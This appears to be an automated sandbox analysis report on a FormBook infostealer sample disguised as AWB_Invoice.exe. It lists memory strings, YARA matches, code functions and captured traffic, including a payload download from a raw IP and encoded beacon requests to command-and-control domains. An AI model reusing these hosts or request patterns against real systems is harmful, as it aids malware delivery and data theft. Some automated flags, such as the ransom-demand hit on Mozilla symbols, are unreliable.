      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/email_website/homepage-baukasten/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/login/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/neue-top-level-domain/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/unternehmen/datenschutz/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/unternehmen/kontakt/
      Source: unknownHTTP traffic detected: POST /hhgu/ HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.sbreyuyufwkg.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sbreyuyufwkg.top/hhgu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 47 38 46 55 36 3d 66 41 49 50 7e 2d 38 30 57 5f 62 6c 51 47 6d 72 67 5a 59 35 7e 73 39 41 42 56 4f 31 50 75 53 72 79 30 6f 4e 6a 59 70 73 36 30 63 5f 6d 36 64 69 66 67 68 37 4b 4e 55 31 4d 33 47 50 75 61 7a 4b 54 7a 43 77 48 54 70 57 59 6e 74 33 7a 47 68 50 76 74 79 55 45 47 49 41 55 70 41 6e 7e 7a 73 67 6b 44 7a 43 49 69 65 38 39 76 38 46 6c 45 79 52 66 31 44 6d 47 41 77 44 56 47 36 6f 58 76 31 41 58 31 70 77 35 45 54 4a 4d 36 74 4c 75 71 53 77 4a 35 5a 5a 58 39 4b 52 57 65 7e 69 57 31 33 6b 7e 46 6d 71 43 38 46 7a 64 37 4d 2d 65 55 5a 39 4c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: YG8FU6=fAIP~-80W_blQGmrgZY5~s9ABVO1PuSry0oNjYps60c_m6difgh7KNU1M3GPuazKTzCwHTpWYnt3zGhPvtyUEGIAUpAn~zsgkDzCIie89v8FlEyRf1DmGAwDVG6oXv1AX1pw5ETJM6tLuqSwJ5ZZX9KRWe~iW13k~FmqC8Fzd7M-eUZ9Lg).
      Source: unknownDNS traffic detected: queries for: www.agtuscany.com
      Source: global trafficHTTP traffic detected: GET /sCgFrPXHcEhHCJiO9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 124.71.228.145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /sCgFrPXHcEhHCJiO9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 124.71.228.145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /sCgFrPXHcEhHCJiO9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 124.71.228.145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=s2yVyDL7KzYWld2BdQllerQcD/GF6Mxs58UQuk2i21kRVAHqZ0RMsLQ1NbuqhCdXsbgwTP46Di1eAkkh+vPQ+IE4AQZ9uoFzyQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.agtuscany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=SCgv9JMQILisbFXy0J496+0pVHmmIO+Ly3gehI9e6TsxoflXN3ldA6wZUkbmg/DjVxLMEiQQPVlU0RkFofCEWjsodLAn22oqlQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=4R3N6uY2KEaFJv5My9X8USGNZqE5wTPbDqipWzMgLmbHXZCAQIUi45Gsr8vYyUhHcb6uJyCcXvi46UGuSQ6cKyZ2u3mWFt6EcQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.vinayakatlantis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=dPIut5mky1KNN3zaAHvK5uzPpNof944ctFAdSBvRpheGYi9HzhIM19d/tYr/fqq+9dholrExeaustykUUMhVEhiWpy+fLWahmQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.devplus.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=1M9SucmICtfCpW/tj24KyOiJ9IaacI1Z4pVA4dfz0JvHGrrKl77RqP3d2y7Nz1UNpIRISpOlczqUmSnOlFPJZEMF2BWLarf/yw==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.15076sediamonddr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=kRRBQ/bHU/W9UkuDtIhtwygoT2D+sgwDIfKWxYHlJR9zKl6zf2tjZKfdztRQYhwD69iGxc9L7QzSu5Kh6I4m2IOVDd3pVDElHQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sberbankfinances.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=2lL86prNXw+vmyyBzvm6Umh532P/K5AtFx4XNAkjw5tRL10GW/bxxzkkZfLlzJDK7KhB1Fc3yjj6fN2xbdgxOm3+/L1UljmTkA==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.dg-computing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=tPdpg+5j5cq3G3NVrgN8qQtsNpTBX2RMNYYlH1Eb7GYZdMqdW/YxFnUShSiyKlH/vw8sFvVppHtL7VWmaInAWO//m3NzV9m1tQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.hangthanhlyonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=gHZL0JWG3wOj6ztmiiV4muoJdl40XHoCcWAONxG5u+5VwItf4ehZOc49QUmaHwAsTMDBmpaDBmzBHnJhASex2uEa6qd8Ly5Wpg==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.minevisn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=bwpeorSwTgARiOW1MBWRQEyO68F/6l/AZk25pS7qV2XiEzJGCZ7h2pTHq/m4oGuSc87Dx3lteJyHEz4BDWZ/BK+hpjxc5sLkyQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.aizhudai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=G2Pxnd335B1F0olFxFH9O2gOs4NA5qrQX1XeOZ+b9Vp4PayRZGChFWxI24R0kVFVx5D5YdtTUzFI+4LopIyzGr/eWdxAOOacEQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.ditchest.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=mD2cofacDINv4VIZu4+thbzlb3X2NPYZmRb9xa7ZzsWw/EQ9wRHnn15uVUQBxnXqiY2i38vokGI7Ta2M6WU2C3lENXSOdU9IMQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.explainqrs.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=caybp/dMTc0WqC/7+5uISxKPk9DN3L4WvDWlcQ7l9xc33fFN4b4HHJNIJYe3LSUbMMu5GOPZ7e8ecQ82F95v7G1g+2VWlWzviQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.martabover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=s2yVyDL7KzYWld2BdQllerQcD/GF6Mxs58UQuk2i21kRVAHqZ0RMsLQ1NbuqhCdXsbgwTP46Di1eAkkh+vPQ+IE4AQZ9uoFzyQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.agtuscany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=SCgv9JMQILisbFXy0J496+0pVHmmIO+Ly3gehI9e6TsxoflXN3ldA6wZUkbmg/DjVxLMEiQQPVlU0RkFofCEWjsodLAn22oqlQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=SCgv9JMQILisbFXy0J496+0pVHmmIO+Ly3gehI9e6TsxoflXN3ldA6wZUkbmg/DjVxLMEiQQPVlU0RkFofCEWjsodLAn22oqlQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=4R3N6uY2KEaFJv5My9X8USGNZqE5wTPbDqipWzMgLmbHXZCAQIUi45Gsr8vYyUhHcb6uJyCcXvi46UGuSQ6cKyZ2u3mWFt6EcQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.vinayakatlantis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=dPIut5mky1KNN3zaAHvK5uzPpNof944ctFAdSBvRpheGYi9HzhIM19d/tYr/fqq+9dholrExeaustykUUMhVEhiWpy+fLWahmQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.devplus.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056DE

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Found potential ransomware demand text
      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: AWB_Invoice.exe
      Source: AWB_Invoice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040755C1_2_0040755C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_00406D851_2_00406D85
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_6F6123511_2_6F612351
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EF5C94_2_358EF5C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E75C64_2_358E75C6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358FA5264_2_358FA526
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589D4804_2_3589D480
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358304454_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E67574_2_358E6757
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358327604_2_35832760
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583A7604_2_3583A760
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358306804_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EA6C04_2_358EA6C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A36EC4_2_358A36EC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EF6F64_2_358EF6F6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584C6004_2_3584C600
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CD62C4_2_358CD62C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DD6464_2_358DD646
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358546704_2_35854670
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358351C04_2_358351C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584B1E04_2_3584B1E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F010E4_2_358F010E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F1134_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CD1304_2_358CD130
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3587717A4_2_3587717A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3586508C4_2_3586508C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358200A04_2_358200A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583B0D04_2_3583B0D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E70F14_2_358E70F1
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DE0764_2_358DE076
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358213804_2_35821380
